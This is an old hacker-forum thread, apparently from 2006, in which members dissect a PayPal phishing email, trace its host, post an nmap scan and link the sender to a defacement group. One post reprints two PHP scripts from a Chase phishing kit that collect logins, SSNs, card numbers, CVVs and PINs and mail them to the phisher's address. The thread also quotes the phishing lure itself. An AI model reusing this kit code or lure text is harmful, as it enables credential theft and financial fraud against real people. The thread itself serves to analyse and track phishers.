Sign in to follow this  
Followers 0
Majest|c

So I check Gmail today

27 posts in this topic

Update Your Information

It has come to our attention that your PayPal account has been accessed by a third party, meaning that an unauthorized person has logged into your account.

We require that you log-in to your account and update your billing information and security questions, so that further third party access can be prevented.

Failure to update your billing information and security questions before March 20th may result in suspension of your account.

To proceed in updating your billing information and security questions, please click on the following link:


https://www.paypal.com/us/cgi-bin/webscr?cmd=_login-update&login_access=1142486462

that link actually pointed to:
http://70.29.183.56/vti_bin/webscr/acc.upgrade=security/PayPal/index.html

And 70.29.183.56 =

Rogers Cable Inc. ROGERS-CAB-8 (NET-70-24-0-0-1)
70.24.0.0 - 70.31.255.255
Rogers Cable Inc. Wlfdle DOC-3-6-0-2-WLFDLE-2 (NET-70-29-183-0-1)
70.29.183.0 - 70.29.183.255

Updating your billing information and security questions will prevent unauthorized third party access, and possibly unauthorized purchases. We thank you for your participation in updating your account.

Sincerely,

The PayPal Tea

0

Share this post


Link to post
Share on other sites

I might mbe wrong but it looks like a Hoax, a scam, a phish. :)

Just delete it and if u want, report it.

0

Share this post


Link to post
Share on other sites

agreed. link. then pointed link? whats the point of that? also the sense it's written in doesn't seem professional.....

Edited by PFI
0

Share this post


Link to post
Share on other sites

Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

0

Share this post


Link to post
Share on other sites
Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

I'm tracking phishers too -- lots of them hang out on irc.darkunix.net.

Used to bust them via egold.

0

Share this post


Link to post
Share on other sites
Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

I'm tracking phishers too -- lots of them hang out on irc.darkunix.net.

Used to bust them via egold.

I already have a thing with paypal, so right now I am not going to release alot of the info, if and when something happens, you will prolly read about it, or I will give you some info!

0

Share this post


Link to post
Share on other sites

Well, if you want to bring in the big guns for resources, drop us a line

sendmephish a t securescience.net

JB

Edited by stonersavant
0

Share this post


Link to post
Share on other sites

Drop me a line too if you like,

just PM me.

0

Share this post


Link to post
Share on other sites

Phishing is our bread and butter, if you'd like my credentials talk to natas, lucky, or Strom :)

0

Share this post


Link to post
Share on other sites
Dam thats sad lol. Im using the same ISP as that phisher, one of the largest in Ontario if not Canada along with Bell Canada.

Found http://70.29.183.56/vti_bin/webscr1/account.upgrade/pp0x.zip

Sad that they cant even phish properly by locking directories.

Good work. According to the scam kit, the drop is at http://70.29.183.56/vti_bin/webscr1/accoun...Pay/pp03948.txt

Interesting 404 message, too.

eBay Client Update Server

Here's nmap:

Interesting ports on CPE123456789cdf-CM001310268b24.cpe.net.cable.rogers.com (70.29.183.56):
(The 1653 ports scanned but not shown below are in state: filtered)
PORT      STATE  SERVICE             VERSION
21/tcp    open   ftp                 WU-FTPD 6.00LS
22/tcp    open   ssh                 OpenSSH 4.2p1 FreeBSD-20050903 (protocol 2.0)
80/tcp    open   http                Apache httpd 1.3.34 ((Unix) PHP/4.4.1)
Device type: general purpose
Running: FreeBSD 5.X
OS details: FreeBSD 5.2-CURRENT (Jan 2004) on x86, FreeBSD 5.2.1 (SPARC)
Uptime 6.455 days (since Mon Mar 13 07:38:20 2006)

# Nmap run completed at Sun Mar 19 18:32:59 2006 -- 1 IP address (1 host up) scanned in 39.127 seconds

Info emailed to chinioti@gmail.com

A quick google scan of this email address brings us to

http://72.14.203.104/search?q=cache:Cde7wa...lient=firefox-a

and it looks like this character is a Pakistani (probably about 15 years old in my opinion from his 'Net ramblings) who is part of a hacking group called Whackerz Pakistan (have as much fun with that name as you see fit :-)) that has been ver busy defacing Western websites in the name of Islam after the whole Danish cartoon affair.

We see an example of their politically charged defacings here:

http://www.yourmother.com/18/index.php3

And another, claiming affilliation with DigitalMind

http://renfah.sonance.net/0rf/0sterreich/

And another at

http://www.lockload.com.au/jobs/

Advertisiing #digitalmind on dalnet, which was vacant when I visited it.

Another attack by this same group is found at

http://www.satorimedia.com/hands_on/

which shows a defacement of a different style, but for the same group. Another email address is listed, threepingplug@yahoo.com, and another irc chan/net: irc.gigachat.net #Whackerz

Here's the zon-h site for them:

http://www.zone-h.org/defacements/filter/f...efacer=WHACKERZ

Edited by stonersavant
0

Share this post


Link to post
Share on other sites

Ok so today I recieved yet another email. I was suprised this time because I never really found any usefull code until today. The scam is Here Doing a little directory browsing, you will find chase.tar.gz which has the php scripts.

Perhaps we can start a phishing section or thread as a project?

0

Share this post


Link to post
Share on other sites

logon.php



<?
$ip = getenv("REMOTE_ADDR");
$usr_name = $HTTP_POST_VARS['usr_name'];
$usr_password = $HTTP_POST_VARS['usr_password'];
$msg="
Ip: $ip
User: $usr_name
Pass: $usr_password
";
mail("epassro@yahoo.com" , "Loginu", $msg);
header("location: account.html?https//chaseonline.chase.com/colappmgr/colportal/customer_nfpb=true&_pageLabel=page_myaccounts");
?>

update.php



<?
$ip = getenv("REMOTE_ADDR");
$FirstName = $HTTP_POST_VARS['FirstName'];
$LastName = $HTTP_POST_VARS['LastName'];
$SSN1 = $HTTP_POST_VARS['SSN1'];
$SSN2 = $HTTP_POST_VARS['SSN2'];
$SSN3 = $HTTP_POST_VARS['SSN3'];
$AccNum = $HTTP_POST_VARS['AccNum'];
$Email = $HTTP_POST_VARS['Email'];
$CC = $HTTP_POST_VARS['CC'];
$bl_cc_expyear = $HTTP_POST_VARS['bl_cc_expyear'];
$bl_cc_expmonth = $HTTP_POST_VARS['bl_cc_expmonth'];
$Cvv = $HTTP_POST_VARS['Cvv'];
$Pin = $HTTP_POST_VARS['Pin'];
$msg="
Ip: $ip
First Name: $FirstName
Last Name: $LastName
SSN: $SSN1/$SSN2/$SSN3
Account Number: $AccNum
Email: $Email
Cartea: $CC
Year: $bl_cc_expyear
Month: $bl_cc_expmonth
Cvv: $Cvv
Pin: $Pin
";
mail("epassro@yahoo.com", "Manhattan", $msg);
header("Location: http://www.chase.com");
?>

0

Share this post


Link to post
Share on other sites

somone should set up an ethical phishing scheme. as soon as someone clicks on the field to enter their CC number a boc would pop up.

STOP! You could have just been scammed. [go on explaining phishing and how to avoid it]

0

Share this post


Link to post
Share on other sites

I would hughly recommend this book if you want to know the background of phishing. It is a bit heavy (as in not a simple read) and if you can get it from your library even better. I have notaffiliation to Mr James but then neither do I to Shakespeare :D

There is a great online test for phishing from Mailfrontier that is an eye opener for those who actually believe there is a Santa. :devil:

Edited by mickeyporkpies
0

Share this post


Link to post
Share on other sites

great links, thanks. I'll check out the ebook, but I never find time to read on the computer.

0

Share this post


Link to post
Share on other sites

Edit by Natas: No w4r3z.

Edited by natas
0

Share this post


Link to post
Share on other sites
Here's the eBook if anyone wants it.

You do know that Lance reads/is a friend of binrev, right?

this bookI have notaffiliation to Mr James but then neither do I to Shakespeare  :D

I do, he's my boss.

MCP, would you please remove the link for the ebook, as a favor?

[edit: Lance and I thank you!!]

Edited by stonersavant
0

Share this post


Link to post
Share on other sites

Phishers beware:



Delivery to the following recipient failed permanently:

   update@paypalservice.com

Technical details of permanent failure:
TEMP_FAILURE: Could not initiate SMTP conversation with any hosts:
[paypalservice.com (1): Connection timed out]

I will overcome :grr:

0

Share this post


Link to post
Share on other sites
Hey Majestic, et al,

I work for an InfoSec company specializing in phishing, if you guys get these phish could you pm me them with the headers? Odds are pretty good we're already tracking this group, the more forensic evidence, the better.

I'm wondering if you interested in those african money transfer schemes too. I just got one after a long time of not seeing one. it even has the nerve to start off appologizing for the unsolicited email. If your lookin for that type of thing pm or email me and let me know.

0

Share this post


Link to post
Share on other sites
I'm wondering if you interested in those african money transfer schemes too. I just got one after a long time of not seeing one. it even has the nerve to start off appologizing for the unsolicited email. If your lookin for that type of thing pm or email me and let me know.

I do some sc@m b a | t i //\\// g once in a while...check out 419eater.org

0

Share this post


Link to post
Share on other sites

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!


Register a new account

Sign in

Already have an account? Sign in here.


Sign In Now
Sign in to follow this  
Followers 0